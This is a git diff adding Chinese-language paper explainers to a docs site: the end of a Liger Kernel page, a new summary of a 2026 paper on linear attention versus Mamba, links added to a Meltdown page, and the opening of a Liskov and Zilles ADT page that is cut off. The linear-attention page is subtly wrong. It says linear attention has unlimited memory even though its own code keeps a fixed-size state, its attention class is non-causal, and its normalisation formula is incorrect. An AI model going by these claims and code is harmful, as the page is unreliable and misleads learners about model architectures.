思想同源)。论文中 seq=16384 时 SwiGLU/GeGLU 峰值显存约降 **1.6×**,速度基本持平。 + +### 5. 正确性工程:不是「快就行」 + +论文专章讨论测试实践: + +- 与 Hugging Face 参考实现对比,fp32 / bf16 设不同 atol/rtol; +- **收敛测试**:小模型完整训练,比对 loss 曲线与权重; +- **连续性(contiguity)**:Triton 直接操作物理内存,非 contiguous 张量会导致 RoPE 等 kernel 静默错误——接入前常需 `.contiguous()`; +- **大维度 int32 溢出**:`program_id * stride` 超 2³¹ 时要转 int64。 + +--- + +## 代码示例 + +### 示例 1:一行给 Hugging Face 模型打补丁(最常用) + +```python +from transformers import AutoModelForCausalLM +from liger_kernel.transformers import apply_liger_kernel_to_llama + +model = AutoModelForCausalLM.from_pretrained( + "meta-llama/Meta-Llama-3-8B-Instruct", + torch_dtype=torch.bfloat16, + device_map="auto", +) + +# 原地替换 RMSNorm、RoPE、SwiGLU、CE、FLCE 等为 Liger Triton 实现 +apply_liger_kernel_to_llama(model) + +# 之后用普通 Trainer / DeepSpeed / FSDP 训练即可 +``` + +等价的 TRL 开关: + +```python +from trl import SFTConfig, SFTTrainer + +trainer = SFTTrainer( + model="meta-llama/Meta-Llama-3-8B", + train_dataset=dataset, + args=SFTConfig( + output_dir="./out", + per_device_train_batch_size=4, + use_liger=True, # 自动加载 AutoLigerKernelForCausalLM + ), +) +trainer.train() +``` + +### 示例 2:手写小模型,单独使用 FLCE(理解分块融合) + +```python +import torch +import torch.nn as nn +from liger_kernel.transformers import LigerFusedLinearCrossEntropyLoss + +# 语言模型头:d=128 维隐藏态,vocab=256 +head = nn.Linear(128, 256, bias=False).cuda() +loss_fn = LigerFusedLinearCrossEntropyLoss() + +# batch=4 个 token 的隐藏向量(已是 lm_head 输入) +hidden = torch.randn(4, 128, requires_grad=True, device="cuda", dtype=torch.bfloat16) +targets = torch.randint(0, 256, (4,), device="cuda") + +# 内部:分 chunk 做 hidden @ W^T,立刻算 CE,不保留完整 logits +loss = loss_fn(head.weight, hidden, targets) +loss.backward() + +# head.weight.grad 与 hidden.grad 已就绪,峰值显存远低于先 materialize logits +``` + +对比朴素写法(**不要在大词表生产路径上用**): + +```python +# 朴素路径:logits (B, T, V) 完整落盘 —— V=256k 时灾难性 +logits = hidden @ head.weight.T # 巨大张量 +loss = torch.nn.functional.cross_entropy(logits, targets) +loss.backward() +``` + +### 示例 3:Triton 风格 — 简化版 Fused RMSNorm 思路(教学用) + +下面不是 Liger 源码,而是帮助理解「融合 + 缓存统计量」的伪 Triton 结构(与 [[triton-llm]] 教程同构): + +```python +import triton +import triton.language as tl + +@triton.jit +def rms_norm_fwd_kernel(x_ptr, y_ptr, rms_ptr, weight_ptr, n_cols, eps, BLOCK: tl.constexpr): + row = tl.program_id(0) + cols = tl.arange(0, BLOCK) + mask = cols < n_cols + + x = tl.load(x_ptr + row * n_cols + cols, mask=mask, other=0.0).to(tl.float32) + rms = tl.sqrt(tl.sum(x * x, axis=0) / n_cols + eps) + tl.store(rms_ptr + row, rms) # 反向复用,避免第二遍扫描 + + w = tl.load(weight_ptr + cols, mask=mask, other=1.0) + y = (x / rms) * w + tl.store(y_ptr + row * n_cols + cols, y, mask=mask) +``` + +Liger 的生产 kernel 还处理多维 stride、bf16/fp32 混合精度、与 Transformer 布局对齐等细节;**思想**是:一次 kernel 完成归一化,并把 RMS **缓存给 backward**。 + +--- + +## 端到端 benchmark 怎么读 + +论文在 4×A100 上对 Alpaca 微调多款 7B–8B 模型(seq=512,bf16,AdamW)。摘录代表性数字: + +| 模型 | batch | 吞吐变化 | 峰值显存变化 | +|------|-------|----------|--------------| +| LLaMA 3-8B | 64 | **+42.8%** | **−54.8%** | +| Qwen2 | 48 | **+25.5%** | **−56.8%** | +| Gemma 7B | 48 | **+11.9%** | **−51.8%** | +| Mistral 7B | 128 | **+27%** | **−21%** | +| Phi-3 | 128 | **+17%** | **−13%** | + +解读要点: + +- 收益与**基线实现质量**有关:HF 路径越「碎」、中间张量越多,Liger 优势越大。 +- 显存省下后,可把 batch 或 seq **再往上推**,吞吐二次受益。 +- 与 FlashAttention 正交:一个管 attention,一个管 norm/FFN/loss;应同时开启。 + +--- + +## 与相关工作的关系 + +```mermaid +flowchart LR + subgraph 训练加速栈 + FA[FlashAttention 系\nattention 内存/算力] + LK[Liger Kernel\nnorm / FFN / CE / FLCE] + DS[DeepSpeed / FSDP\n分片与 ZeRO] + end + FA --> 端到端训练 + LK --> 端到端训练 + DS --> 端到端训练 +``` + +| 对比对象 | 关系 | +|----------|------| +| [[flash-attention]] / [[flashattention-2]] | 互补;Liger 明确支持与 FlashAttention 共存 | +| PyTorch `torch.compile` / Inductor | 都追求融合;Liger 是**手工调优的 domain-specific kernel**,对大词表 CE 等场景更成熟 | +| `efficient_cross_entropy` 等社区方案 | FLCE 的 chunking 思路受其启发(论文致谢 GitHub discussion) | +| CUDA 手写 kernel | Triton 更易维护、跨 GPU autotune;Liger 选择 Triton 换开发效率 | + +--- + +## 踩坑与最佳实践 + +1. **先确认张量 contiguous**:尤其 RoPE 接 `scaled_dot_product_attention` 后,layout 可能非连续,loss 会「能跑但不对」。 +2. **bf16 收敛测试**:kernel 级 atol/rtol 放宽后,仍建议跑几百 step 看 loss 曲线是否与 baseline 重合。 +3. **不要指望推理加速**:Liger 面向**训练**路径;推理瓶颈通常在 decode attention 与 KV cache(见 [[paged-attention-vllm]]),不是 RMSNorm 融合。 +4. **词表越大,FLCE 越值得开**:7B + 32k vocab 可能「有感但不夸张」;128k/256k + 长上下文时往往是**能不能训下去**的分水岭。 +5. **分布式兼容性**:官方测试覆盖 FSDP、DeepSpeed ZeRO;升级 PyTorch/TRL 后留意 patch 函数是否与模型类名匹配。 + +--- + +## 适用 vs 不适用 + +| 场景 | 建议 | +|------|------| +| HF/TRL 上微调 Llama、Qwen、Gemma、Mistral 等 | **强烈推荐** `use_liger=True` 或对应 `apply_liger_kernel_to_*` | +| 超大词表预训练 / SFT | **必看 FLCE** | +| Medusa 等多解码头训练 | **强烈推荐**(避免多头 logits OOM) | +| 自定义 nn.Module、自研训练栈 | 可单独引入 `LigerRMSNorm`、`LigerFusedLinearCrossEntropyLoss` 等 | +| 只做推理部署 | 通常**不需要** | +| 极小模型 / 教学 demo | 收益有限,复杂度不划算 | + +--- + +## 小结 + +Liger Kernel 的核心贡献不是新算法,而是**把 LLM 训练里「每层都跑、却长期被忽视」的算子,用 Triton 做成融合、省显存、易集成的工业级实现**: + +1. **Kernel fusion** 减少 HBM 往返与 launch 开销; +2. **In-place gradient + online softmax** 压缩 CrossEntropy 显存; +3. **FusedLinearCrossEntropy + chunking** 解决大词表 logits 物化问题; +4. **模块化 API** 让新手一行启用、专家可拆 kernel 组装。 + +若你已用上 FlashAttention,却仍在训练时撞显存或吞吐不理想,下一步很值得检查:**最后一层 CE 与各类 Norm/FFN 是否还在走 PyTorch 默认的「多趟收费站」路径**。 + +--- + +## 延伸阅读 + +- 论文:[arXiv:2410.10989](https://arxiv.org/abs/2410.10989) +- 代码:[github.com/linkedin/Liger-Kernel](https://github.com/linkedin/Liger-Kernel) +- 文档:[linkedin.github.io/Liger-Kernel](https://linkedin.github.io/Liger-Kernel/) +- Triton 背景:[[triton-2019]]、[[triton-llm]] +- Attention 优化:[[flash-attention]]、[[flashattention-2]] +- 推理侧 KV 管理:[[paged-attention-vllm]] diff --git a/src/content/docs/papers/linear-attention-still-2026.md b/src/content/docs/papers/linear-attention-still-2026.md new file mode 100644 index 000000000..6bdd0d0cd --- /dev/null +++ b/src/content/docs/papers/linear-attention-still-2026.md @@ -0,0 +1,349 @@ +--- +title: Linear Attention, Still: Why Mamba-style Models Plateau +来源: https://arxiv.org/abs/2605.30621 +日期: 2026-06-13 +分类: 机器学习 +子分类: 模型与训练 +provenance: pipeline-v3 +--- + +# Linear Attention, Still: Why Mamba-style Models Plateau + +## 一、一句话总结 + +这篇论文说:Mamba 这类状态空间模型(SSM)之所以在长序列上性能不如 Transformer,根本原因是它们的"记忆窗口"太短——它们只能记住最近的几百个 token,而线性注意力(Linear Attention)通过一个更简单的数学 trick 就能做到无限记忆窗口,而且速度一样快。 + +## 二、日常类比:餐厅服务员 vs 餐厅经理 + +想象你要点一道复杂的菜,厨师需要参考之前的订单记录。 + +**Transformer(带 Attention)**:像一个记忆力超群的经理,他能同时记住你过去所有订单的每一个细节。每次你下单,他都会把历史订单全部翻一遍,找出相似的模式来帮你决策。好处是精准,坏处是如果订单多了(比如几千条),翻完所有记录要花很久。 + +**Mamba / SSM**:像一个有经验的服务员,他只用一本小笔记本。每来一个新订单,他就把笔记本上的内容更新一下——旧的淡出,新的写入。本子容量有限,所以他只能记住最近的几十条。好处是快,坏处是太早的订单全忘了。 + +**Linear Attention**:像另一个经理,他也记所有订单,但他不逐条翻阅,而是用一个"摘要本"——把所有订单的关键特征累加在一起。每次查的时候只看摘要本,速度极快,而且理论上摘要本可以无限大,不会遗忘。 + +论文的核心发现就是:服务员(Mamba)之所以跑不赢经理(Transformer),不是因为服务员笨,而是因为本子的容量限制。而那个用摘要本的经理(Linear Attention),既快又不忘。 + +## 三、核心概念拆解 + +### 3.1 标准 Attention(Scaled Dot-Product Attention) + +这是 Transformer 的核心。它的计算方式是: + +```python +def standard_attention(Q, K, V): + """ + Q, K, V 都是形状为 [batch, seq_len, d_model] 的张量 + + 标准 Attention 的计算公式: + Attention(Q, K, V) = softmax(Q @ K^T / sqrt(d)) @ V + + 其中 @ 表示矩阵乘法,^T 表示转置 + """ + d = Q.shape[-1] # 隐藏层维度 + + # 第一步:计算 Q 和 K 的点积 —— 衡量每个位置对其他位置的"关注程度" + scores = Q @ K.transpose(-2, -1) / (d ** 0.5) + + # 第二步:Softmax 归一化 —— 把分数变成概率分布(加起来等于 1) + attention_weights = softmax(scores, dim=-1) + + # 第三步:用权重加权求和 V —— 综合所有位置的信息 + output = attention_weights @ V + + return output +``` + +**复杂度问题**:Q 和 K 相乘得到的是 `[batch, seq_len, seq_len]` 的矩阵。如果序列长度是 10000,这个矩阵就有 1 亿个元素。这就是为什么 Transformer 处理长序列很慢——**时间复杂度是 O(n^2)**。 + +### 3.2 线性注意力(Linear Attention) + +线性注意力的关键洞察:**交换 Softmax 和矩阵乘法的顺序**。 + +```python +def linear_attention(Q, K, V): + """ + 线性 Attention 的计算方式: + + 标准 Attention: softmax(QK^T) @ V + 线性 Attention: (softmax(QK^T) @ V) + ≈ (QK^T @ V) 去掉 softmax 或用核函数近似 + + 利用结合律:(QK^T) @ V = Q @ (K^T @ V) + 先算 K^T @ V,再把结果和 Q 相乘 + """ + # 第一步:先算 K^T @ V —— 这是一个 [d, d] 的小矩阵 + KV = K.transpose(-2, -1) @ V # [batch, d, d] + + # 第二步:再用 Q 乘以这个聚合结果 + output = Q @ KV # [batch, seq_len, d] + + return output +``` + +**复杂度优势**:K^T @ V 的结果只和维度 d 有关,和序列长度 n 无关。所以总复杂度是 **O(n)**,线性增长。 + +### 3.3 状态空间模型(SSM)/ Mamba + +Mamba 是 SSM 的高效实现。它的核心思想是用一个"状态向量"来压缩历史信息: + +```python +def ssm_step(x_t, state, params): + """ + SSM 的单步递推: + + state_{t} = A @ state_{t-1} + B @ x_t (状态更新) + y_t = C @ state_t (输出) + + 其中 A, B, C 是模型参数(可以是随时间变化的) + x_t 是当前输入,y_t 是当前输出 + """ + A, B, C = params + + # 状态按指数衰减:旧信息逐渐"遗忘" + new_state = A @ state + B @ x_t + + # 输出只依赖当前状态 + output = C @ new_state + + return output, new_state + + +def mamba_forward(sequence, params): + """ + Mamba 对整个序列的前向传播: + + 依次递推,每一步只依赖前一步的状态 + """ + state = zeros(params.A.shape[0]) # 初始状态为零 + outputs = [] + + for x_t in sequence: # 逐个 token 处理 + output, state = ssm_step(x_t, state, params) + outputs.append(output) + + return stack(outputs) +``` + +**关键限制**:SSM 的状态向量维度是固定的(比如 64 或 128),这意味着它能存储的信息总量是有上限的。早期的信息会被指数级衰减掉。论文把这个称为 **"记忆瓶颈"**。 + +## 四、论文的三大核心发现 + +### 发现一:Mamba 的记忆窗口只有约 1K-2K tokens + +论文通过实验测量了不同模型能"有效记住"多远的位置。结果是: + +- Transformer(Attention):理论上可以记住任意远的位置 +- Mamba / SSM:有效记忆窗口大约 1000-2000 个 token +- 超过这个距离后,模型表现几乎退化到"完全不知道前面有什么" + +这就像服务员的小笔记本只能写一页,翻到第二页第一页的内容就看不见了。 + +### 发现二:Linear Attention 在长序列上持续超越 Mamba + +论文在多个基准测试中对比了 Linear Attention 和 Mamba: + +- 短序列(< 512 tokens):两者差距不大 +- 中等序列(1K-4K tokens):Linear Attention 开始领先 +- 长序列(8K+ tokens):Linear Attention 显著优于 Mamba + +### 发现三:Linear Attention 的改进方向很清晰 + +论文指出,如果把 Linear Attention 中的核函数(kernel function)设计得更好,性能还能继续提升。具体来说: + +1. 用更好的核函数替代简单的 exp 衰减 +2. 加入位置编码的感知 +3. 多层堆叠时的信息保留策略 + +## 五、为什么这个发现重要? + +### 对模型设计的启示 + +```python +# 传统思路:在 SSM 上下功夫 +# 假设:SSM 不够好是因为实现不够精妙 +# 于是不断修改 A, B, C 参数的计算方式 + +# 论文揭示的思路:SSM 不够好是因为理论上限低 +# 假设:SSM 的记忆瓶颈是根本性的 +# 于是转向 Linear Attention —— 它有更高的理论上限 +``` + +### 对实际工程的启示 + +如果你在做长文本处理(比如代码生成、法律文档分析、医学报告),Linear Attention 可能是比 Mamba 更好的选择。原因很简单: + +- 你的文本可能长达数万 token +- Mamba 只能记住最近的一两千个 +- Linear Attention 可以记住全部,而且速度一样快 + +## 六、代码对比:三种方法的完整实现 + +```python +import torch +import torch.nn as nn +import torch.nn.functional as F + + +class StandardAttention(nn.Module): + """标准 Transformer Attention —— O(n^2) 复杂度""" + + def __init__(self, d_model, num_heads=8): + super().__init__() + self.num_heads = num_heads + self.d_k = d_model // num_heads + self.W_q = nn.Linear(d_model, d_model) + self.W_k = nn.Linear(d_model, d_model) + self.W_v = nn.Linear(d_model, d_model) + self.W_o = nn.Linear(d_model, d_model) + + def forward(self, x): + batch_size, seq_len, _ = x.shape + + Q = self.W_q(x).view(batch_size, seq_len, self.num_heads, self.d_k) + K = self.W_k(x).view(batch_size, seq_len, self.num_heads, self.d_k) + V = self.W_v(x).view(batch_size, seq_len, self.num_heads, self.d_k) + + Q = Q.transpose(1, 2) # [batch, heads, seq, d_k] + K = K.transpose(1, 2) + V = V.transpose(1, 2) + + # 计算注意力分数 —— O(n^2) + scores = torch.matmul(Q, K.transpose(-2, -1)) / (self.d_k ** 0.5) + attn = F.softmax(scores, dim=-1) + + # 加权求和 + output = torch.matmul(attn, V) + output = output.transpose(1, 2).reshape(batch_size, seq_len, -1) + + return self.W_o(output) + + +class LinearAttention(nn.Module): + """线性 Attention —— O(n) 复杂度,理论上无限记忆""" + + def __init__(self, d_model, num_heads=8): + super().__init__() + self.num_heads = num_heads + self.d_k = d_model // num_heads + self.W_q = nn.Linear(d_model, d_model) + self.W_k = nn.Linear(d_model, d_model) + self.W_v = nn.Linear(d_model, d_model) + self.W_o = nn.Linear(d_model, d_model) + # 小的 epsilon 防止除零 + self.eps = 1e-6 + + def forward(self, x): + batch_size, seq_len, _ = x.shape + + Q = F.relu(self.W_q(x)) # ReLU 作为正核函数 + K = F.relu(self.W_k(x)) + V = self.W_v(x) + + Q = Q.view(batch_size, seq_len, self.num_heads, self.d_k) + K = K.view(batch_size, seq_len, self.num_heads, self.d_k) + V = V.view(batch_size, seq_len, self.num_heads, self.d_k) + + Q = Q.transpose(1, 2) + K = K.transpose(1, 2) + V = V.transpose(1, 2) + + # 关键优化:先算 K^T @ V,再和 Q 相乘 + # K^T @ V 的结果是 [batch, heads, d_k, d_k] —— 和序列长度无关! + KV = torch.matmul(K.transpose(-2, -1), V) + output = torch.matmul(Q, KV) + + # 归一化 + denominator = Q.sum(dim=-1, keepdim=True).clamp(min=self.eps) + output = output / denominator + + output = output.transpose(1, 2).reshape(batch_size, seq_len, -1) + return self.W_o(output) + + +class BasicSSM(nn.Module): + """简化版 SSM(Mamba 的核心组件)—— 有记忆瓶颈""" + + def __init__(self, d_model, state_dim=64): + super().__init__() + self.d_model = d_model + self.state_dim = state_dim + + # SSM 的参数 + self.A = nn.Parameter(torch.randn(state_dim, state_dim) * 0.1) + self.B = nn.Linear(d_model, state_dim) + self.C = nn.Linear(state_dim, d_model) + self.output_gate = nn.Linear(d_model, d_model) + + def forward(self, x): + """ + x: [batch, seq_len, d_model] + + 对每个时间步递推: + state_t = A @ state_{t-1} + B @ x_t + y_t = C @ state_t * sigmoid(gate_t) + """ + batch_size, seq_len, _ = x.shape + state = torch.zeros(batch_size, self.state_dim, device=x.device) + outputs = [] + + for t in range(seq_len): + x_t = x[:, t, :] # [batch, d_model] + + # 状态更新 —— 注意 A 的特征值通常小于 1, + # 导致旧信息指数衰减 + state = torch.matmul(state, self.A.t()) + self.B(x_t) + + # 输出 + output = self.C(state) * torch.sigmoid(self.output_gate(x_t)) + outputs.append(output) + + return torch.stack(outputs, dim=1) +``` + +## 七、关键数学直觉 + +### 为什么 SSM 会遗忘? + +SSM 的状态更新公式是: + +``` +state_t = A @ state_{t-1} + B @ x_t +``` + +如果 A 的特征值都小于 1(这是稳定性的要求),那么: + +``` +state_t = A^n @ state_0 + A^{n-1}B @ x_1 + ... + A @ x_{n-1} + B @ x_n +``` + +A 的幂次越高,贡献越小。也就是说,**第 1 步的信息在 100 步之后只剩原来的 A^100**。如果 A = 0.99,那么 100 步后只剩 37%,1000 步后只剩 0.004%。 + +### 为什么 Linear Attention 不会遗忘? + +Linear Attention 的聚合形式是: + +``` +output = Q @ (sum_i K_i^T @ V_i) +``` + +这个 sum 是**累加的**,不会衰减。第 1 步的信息和第 10000 步的信息以同等权重被包含在内。只要核函数设计得当,理论上没有任何信息会被"冲掉"。 + +## 八、学习小结 + +这篇论文的价值不在于提出了一个新模型,而在于**用系统性的实验澄清了一个长期存在的混淆**: + +| 模型类型 | 记忆能力 | 计算复杂度 | 长序列表现 | +|---------|---------|-----------|----------| +| Transformer (Attention) | 无限 | O(n^2) | 好但慢 | +| Mamba (SSM) | 约 1K tokens | O(n) | 中等 | +| Linear Attention | 无限 | O(n) | 好且快 | + +对零基础学习者的建议: + +1. 先理解标准 Attention 的 O(n^2) 瓶颈在哪里 +2. 再理解 Linear Attention 如何通过矩阵结合律打破这个瓶颈 +3. 最后理解 SSM 的记忆瓶颈是结构性的,不是工程问题 + +这篇论文告诉我们:有时候模型跑不动不是因为不够聪明,而是因为"笔记本太小"。换一种记录方式,比不断改良记录方式更有效。 diff --git a/src/content/docs/papers/lipp-meltdown-2018.md b/src/content/docs/papers/lipp-meltdown-2018.md index b873d2179..3fc162a7c 100644 --- a/src/content/docs/papers/lipp-meltdown-2018.md +++ b/src/content/docs/papers/lipp-meltdown-2018.md @@ -163,5 +163,9 @@ Meltdown 论文在**公有云实例**上验证:同一物理机上的普通 VM - [[hoare-logic]] —— Hoare Logic — 把"程序对不对"变成"数学证明对不对" - [[kildall-dataflow]] —— Kildall 数据流框架 — 用一套格论统一所有全局编译优化 - [[libsignal]] —— libsignal — 端到端加密的 Rust 内核 +- [[log4shell-cve-2021-44228]] —— Log4Shell (CVE-2021-44228) — 一条日志字符串如何远程控制服务器 +- [[meltdown-attack-2018]] —— Meltdown — 从用户空间偷读内核内存 +- [[rowhammer-2014]] —— Row Hammer — 不碰邻居也能把邻居的位翻过来 +- [[spectre-attack-2018]] —— Spectre Attacks — 推测执行如何绕过边界检查偷读内存 - [[xen-2003]] —— Xen 2003 — 让操作系统配合虚拟化,性能直接接近原生 diff --git a/src/content/docs/papers/liskov-abstraction-1974.md b/src/content/docs/papers/liskov-abstraction-1974.md new file mode 100644 index 000000000..b1d2b0f10 --- /dev/null +++ b/src/content/docs/papers/liskov-abstraction-1974.md @@ -0,0 +1,267 @@ +--- +title: Programming with Abstract Data Types — Liskov & Zilles 1974 抽象数据类型宣言 +来源: https://en.wikipedia.org/wiki/Abstract_data_type +日期: 2026-06-13 +分类: 编程语言 +子分类: 类型与 PL 理论 +难度: 入门 +provenance: pipeline-v3 +--- + +## 是什么 + +1974 年 3 月,MIT 的 **Barbara Liskov** 与 IBM 剑桥系统组的 **Stephen Zilles** 在 *ACM SIGPLAN Notices*(第 9 卷第 4 期,页 50–59)发表了 **Programming with Abstract Data Types**。论文出自他们为**结构化编程**设计一门新语言(后来定名为 **CLU**)的工作,首次把「抽象数据类型(Abstract Data Type, ADT)」写成了可操作的编程语言机制,而不只是教科书里的概念。 + +日常类比:你去银行办业务,柜台只给你**账户号、存款、取款、查余额**这几项操作——你不需要知道金库里钞票怎么码放、账本记在哪种数据库里。若银行明天把账本从纸质换成电子,只要「存款 / 取款」的语义不变,你的用法就不变。**ADT 就是把这种「只暴露操作、隐藏实现」的契约,写进编程语言里。** + +论文要回答的核心问题是:高级语言内置的 `int`、`array` 等抽象永远不够用,语言设计者**不可能提前猜中**所有领域需要的类型。解决办法不是无限往语言里塞新关键字,而是给程序员一种**自己定义新抽象**的机制——在 CLU 里叫 **operation cluster(操作簇,简称 cluster)**。 + +## 历史背景 + +| 时间 | 事件 | +|------|------| +| 1968 | Dijkstra 发表 [[dijkstra-goto-1968]],结构化编程运动兴起 | +| 1971–72 | Wirth 等人推广**逐步求精(stepwise refinement)**:先写抽象机器上的程序,再一层层填实现细节 | +| 1973 | Liskov 在 MIT 技术报告中提出 cluster 雏形,对象放堆上、编译期完整类型检查 | +| 1974-03 | 本文在「Very High Level Languages」研讨会上发表(DOI: [10.1145/942572.807045](https://doi.org/10.1145/942572.807045)) | +| 1975+ | CLU 实现成熟;Java `class`、C++ `class`、Rust `struct` + `impl`、Go 未导出字段等,都可视为 ADT 思想的后裔 | +| 1980s | Guttag 等人发展**代数规范**;Liskov 本人因 CLU 与分布式系统工作获 2008 年图灵奖 | + +论文写于「极高层次语言(very-high-level languages)」热潮之中:目标是把程序员从位运算和内存布局里解放出来,让他**在问题域合适的抽象上思考**。Liskov 与 Zilles 的洞见是:**抽象本身也应该是可扩展的**——语言应像「无限层次的高级语言」,而不是固定抽象清单。 + +## 为什么重要 + +不理解这篇 1974 年的短文,下面这些事很难放在同一张图上: + +- 为什么 Java 的 `List` 接口、Rust 的 `trait`、Go 的「小接口」都在说**行为定义类型**,而不是「这个 struct 里有哪些字段」 +- 为什么「把表示细节藏起来」是模块边界的第一原则,而不是可有可无的编码风格 +- 为什么 [[standard-ml]] 的 `signature` / `structure`、OCaml 的模块、Haskell 的 `data` + 导出列表,都和同一套 ADT 家谱有关 +- 为什么后来 **Liskov 替换原则(LSP)** 讨论的是「子类型能否替换父类型」——名字里的 Liskov 就是本文作者 + +本文还区分了**逻辑结构**与**物理结构**:程序员负责清晰、可维护的逻辑结构;编译器负责映射到高效机器代码。这一分工预见了今天「写可读代码、让编译器优化」的主流做法。 + +## 核心概念 + +### 1. 抽象数据类型(ADT) + +论文给出的定义(意译): + +> 抽象数据类型是一类**抽象对象**,这类对象**完全由其上可执行的操作所刻画**。因此,定义一个 ADT,就是定义刻画该类型的那一组操作。 + +注意三个关键词: + +- **对象(object)**:有身份、可存于变量中、可传参(CLU 里对象在堆上,变量持有引用) +- **操作(operations)**:外界与这类对象交互的**唯一**合法入口 +- **完全刻画**:不允许用户依赖「内部长什么样」——否则抽象就漏了 + +这与维基百科上 ADT 条目一致:ADT 是**数学模型**加上**操作集合**;实现可以换,只要操作语义不变。 + +### 2. 操作簇(operation cluster / cluster) + +ADT 在 CLU 中的实现单元叫 **cluster**,结构上分三块: + +1. **头部(header)**:列出对外可见的操作名(如 `push`, `pop`, `empty`) +2. **表示(rep)**:只在 cluster **内部**可见的数据布局 +3. **操作实现**:创建对象与各项操作的代码 + +只有 cluster 内部的代码能访问 `rep`;集群外的程序**只能通过声明的操作**碰对象。这就是今天说的 **封装(encapsulation)**。 + +### 3. 函数抽象(functional abstraction) + +并非所有过程都绑定在某个 ADT 上。论文把**不隶属于某一抽象类型的操作**称为 **functional abstraction**——例如通用的排序、格式化输出。有了 ADT 之后,「程序里的大多数抽象操作会属于某个类型的操作集」,剩下少数是函数抽象。 + +### 4. 调用语法:`type$operation(object, args...)` + +CLU 用 **`类型名$操作名(参数)`** 调用抽象操作,**第一个参数总是目标对象**。例如 `stack$push(s, token)`。带上类型名是为了: + +- 消歧:多个参数可能是不同 ADT 时,明确操作属于哪个类型 +- 允许不同 ADT 使用同名操作(如多种类型都有 `create`)而不冲突 + +现代语言里 `s.push(token)` 只是语法糖;论文时代的显式写法更利于早期编译器的类型检查。 + +### 5. 类型参数(泛型) + +cluster 可以带 **type parameter**,例如 `stack(element_type: type)` 定义「元素类型可参数化」的栈。实例化时 `stack(integer)` 与 `stack(token)` 是**不同类型**,各自类型检查独立——这是参数化多态,比 C 宏安全得多。 + +### 6. 与结构化编程的关系 + +论文把 ADT 嵌进 **逐步求精** 流程: + +1. 先在「抽象机器」上写程序——这台机器恰好提供你设计好的 ADT 和操作 +2. 再为每个 ADT 写 cluster,把抽象机器「落地」到真实表示 + +这样每一层只关心**当前层的契约**,符合 Dijkstra「一次做一个决定」的原则。ADT 让**数据方面的决定**也可以推迟,而不只是控制流方面的决定。 + +### 7. 逻辑结构 vs 物理结构 + +程序员写的是**逻辑结构**(易读、易改);编译器生成的是**物理结构**(快、省内存)。两者可以不一致,只要工具链保证调试器、类型检查等仍按逻辑结构呈现。论文承认:好逻辑结构不自动等于好性能,但把优化交给编译器比让人手写纠缠在一起更可持续。 + +## 代码示例 + +### 示例 1:论文中的参数化栈 cluster(CLU 语法,节选) + +下面改编自 Liskov & Zilles 论文与后续 CLU 文献中的经典 `stack` 定义,展示 **header + rep + create + operations** 三部分如何拼在一起: + +```text +stack: cluster(element_type: type) + is push, pop, top, erasetop, empty: + + rep(type_param: type) = ( + tp: integer; + e_type: type; + stk: array[1..] of type_param; + ) + + create + s: rep(element_type); + s.tp := 0; + s.e_type := element_type; + return s; + end + + push: operation(s: rep, v: s.e_type); + s.tp := s.tp + 1; + s.stk[s.tp] := v; + return; + end + + pop: operation(s: rep) returns s.e_type; + v: s.e_type := s.stk[s.tp]; + s.tp := s.tp - 1; + return v; + end + + empty: operation(s: rep) returns boolean; + return s.tp = 0; + end +end stack +``` + +**怎么读这段「外星语法」:** + +- `stack(element_type: type)`:定义一个**泛型**栈,元素类型由调用方指定 +- `rep(...)`:**只有** `stack` 这个 cluster 内部能看见 `tp`(栈顶指针)和 `stk` 数组 +- 集群外用户写 `s: stack(integer)` 或 `s: stack(token)`,只能调用 `stack$push(s, x)` 等,**不能**写 `s.tp` +- 若你把 `rep` 从数组改成链表,只要 `push`/`pop`/`empty` 语义不变,用户代码**零修改** + +这就是 ADT 相对「裸结构体 + 全局函数」的胜利:**不变式(invariant)**(如 `0 ≤ tp ≤ length`)被关在 cluster 门内维护。 + +### 示例 2:同一 ADT 思想在现代 TypeScript 中的写法 + +今天多数语言没有 `$` 语法,但契约相同:对外只导出操作,隐藏 `rep`。 + +```typescript +// 文件: stack.ts — 表示细节不导出 +type StackRep = { items: T[] }; + +export function createStack(): StackRep { + return { items: [] }; +} + +export function push(s: StackRep, v: T): void { + s.items.push(v); +} + +export function pop(s: StackRep): T { + if (s.items.length === 0) throw new Error("empty stack"); + return s.items.pop()!; +} + +export function isEmpty(s: StackRep): boolean { + return s.items.length === 0; +} +``` + +```typescript +// 文件: main.ts — 用户层只依赖操作,不碰 items +import { createStack, push, pop, isEmpty } from "./stack"; + +const s = createStack(); +push(s, 1); +push(s, 2); +while (!isEmpty(s)) { + console.log(pop(s)); // 2, then 1 +} +``` + +TypeScript 的 `StackRep` 类型在技术上仍可从模块外访问字段——语言靠**约定**而非硬封装。Java、C#、Rust 用 `private` 字段做到编译器强制;CLU 用 `rep` 作用域做到**语言级**强制。论文 1974 年就坚持:**没有硬边界,抽象会随维护慢慢泄漏。** + +### 示例 3:对比「非 ADT」写法——为什么论文要发明 cluster + +```python +# 反模式:任何人都能破坏栈的不变式 +class Stack: + def __init__(self): + self.items = [] + +def broken_pop(s: Stack): + s.items = [] # 合法 Python,但语义灾难 +``` + +```python +# 更接近 ADT:只暴露方法,内部用 _items 约定私有 +class Stack: + def __init__(self): + self._items: list = [] + + def push(self, v): + self._items.append(v) + + def pop(self): + if not self._items: + raise IndexError("empty") + return self._items.pop() +``` + +Python 的 `_items` 仍是君子协定;CLU / Java / Rust 则让编译器拒绝 `s._items` 式访问。论文的价值在于把「银行柜台」模型**写进语言语义**,而不只是团队规范。 + +## 与 CLU 语言的其他遗产 + +本文是 CLU 设计文档之一,同一语言还影响了: + +- **异常(exception)**:结构化错误处理 +- **迭代器(iterator)**:比单纯 `for` 更灵活的遍历抽象 +- **基于堆的对象 + 强类型**:与 C 结构体数组划清界限 + +Liskov 在 1980 年代 MIT 技术报告 *Abstraction Mechanisms in CLU* 中进一步用编程例子说明**过程抽象、控制抽象、数据抽象**三类抽象如何配合。读 1974 本文可视为理解 CLU 乃至整个「OO 之前的数据抽象」路线的入口。 + +## 常见误解 + +| 误解 | 澄清 | +|------|------| +| ADT = `class` | ADT 是**契约**(操作集);`class` 只是实现契约的一种语言手段。Java `interface` + 多个实现更接近论文精神 | +| ADT 反对性能 | 论文明确区分逻辑/物理结构,并期望编译器优化映射;不是「为了抽象而牺牲速度」 | +| 本文发明了面向对象 | 论文**没有**子类继承;Liskov 后来才系统讨论子类型。ADT 是 **OO 的数据抽象子集**,不是 OO 全体 | +| 只有系统语言需要 ADT | 只要模块边界存在(API、微服务 DTO、配置对象),「只暴露操作」都适用 | + +## 与今日实践的对应 + +| 1974 论文概念 | 现代对应 | +|---------------|----------| +| 